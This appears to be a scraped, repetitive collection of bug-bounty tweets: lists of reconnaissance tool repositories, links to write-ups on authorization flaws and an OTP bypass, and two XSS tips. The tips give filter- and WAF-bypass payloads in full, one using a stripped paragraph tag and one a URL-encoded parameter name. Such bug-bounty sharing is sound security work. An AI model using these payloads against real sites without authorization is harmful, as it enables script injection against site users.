#ReconTools
https://github.com/m0rtem/CloudFail
https://github.com/s0md3v/ReconDog
https://github.com/BishopFox/GitGot
https://github.com/redhuntlabs/Awesome-Asset-Discovery
https://github.com/leebaird/discover
https://github.com/s0md3v/Arjun
https://github.com/s0md3v/Striker
https://github.com/shmilylty/OneForAll
https://github.com/Ekultek/Zeus-Scanner
https://github.com/SimplySecurity/SimplyEmail
#bugbounty,#bugbountytips
https://github.com/m0rtem/CloudFail
https://github.com/s0md3v/ReconDog
https://github.com/BishopFox/GitGot
https://github.com/redhuntlabs/Awesome-Asset-Discovery
https://github.com/leebaird/discover
https://github.com/s0md3v/Arjun
https://github.com/s0md3v/Striker
https://github.com/shmilylty/OneForAll
https://github.com/Ekultek/Zeus-Scanner
https://github.com/SimplySecurity/SimplyEmail
#bugbounty,#bugbountytips
GitHub
GitHub - m0rtem/CloudFail: Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network
Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network - m0rtem/CloudFail
#AuthorizationFlaw
https://t.co/xTfk0rtU2b
https://t.co/UUuzHRoumr
https://t.co/t5lABoDmvv
https://t.co/EPdKI16qBj
https://t.co/5EYYOudexQ
https://t.co/BZuzGpH4Zq
https://t.co/oY4Y2GdaBN
https://t.co/3Fn228RvEj
https://t.co/fkEEQy58h4
https://t.co/YwboWlM08f
#bugbounty
https://t.co/xTfk0rtU2b
https://t.co/UUuzHRoumr
https://t.co/t5lABoDmvv
https://t.co/EPdKI16qBj
https://t.co/5EYYOudexQ
https://t.co/BZuzGpH4Zq
https://t.co/oY4Y2GdaBN
https://t.co/3Fn228RvEj
https://t.co/fkEEQy58h4
https://t.co/YwboWlM08f
#bugbounty
Medium
Page Admin Disclosure via an Upgraded Page Post
Been in the bug bounty and/or ethical hacking scene for more than 2 years now and this is my first write-up (I hope you bear with me)…
How I bypassed the OTP verification process?
Part 1:-
https://link.medium.com/0QZ7nYDKG4
Part 2:-
https://link.medium.com/Ew0iyvBKG4
Part 3:-
https://link.medium.com/QaMpQOCKG4
Part 1:-
https://link.medium.com/0QZ7nYDKG4
Part 2:-
https://link.medium.com/Ew0iyvBKG4
Part 3:-
https://link.medium.com/QaMpQOCKG4
Medium
How I bypassed the OTP verification process? Part — 1
It’s been so long since I posted any article, partially because I was tired and taking a pleasant summer break. I was reading this…
XSS filter bypass using stripped </p> tag to obfuscate.
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty
XSS WAF Bypass Tip:
try url encoding the parameter name in your PoC URL!
?page=";confirm`1`//
Rightwards arrow
302
?pag%65=";confirm`1`//
Rightwards arrow
200 + XSS!
#bugbountytips
try url encoding the parameter name in your PoC URL!
?page=";confirm`1`//
Rightwards arrow
302
?pag%65=";confirm`1`//
Rightwards arrow
200 + XSS!
#bugbountytips